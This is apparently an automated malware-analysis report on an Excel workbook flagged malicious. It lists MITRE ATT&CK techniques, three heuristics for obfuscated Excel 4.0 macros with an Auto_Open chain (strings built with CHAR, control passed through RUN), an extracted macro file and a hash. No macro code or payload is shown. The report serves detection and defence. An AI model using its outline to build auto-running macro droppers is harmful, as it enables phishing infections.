MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains critical heuristics indicating the presence of obfuscated Excel 4.0 (XLM) macros with an Auto_Open execution chain. The macro sheet contains a formula that appears to be constructing a string using CHAR functions, suggesting it's designed to execute arbitrary code. This is a common technique for downloading and executing secondary payloads.
Heuristics 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- Obfuscated XLM Auto_Open execution chain (critical, OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 130450 bytes |

SHA-256: c2eb1d7ec24c9c4798149bb2cae7234587c2f02f589b9a57c46bea19eb3e062a

Preview script: first 1,000 lines of the extracted script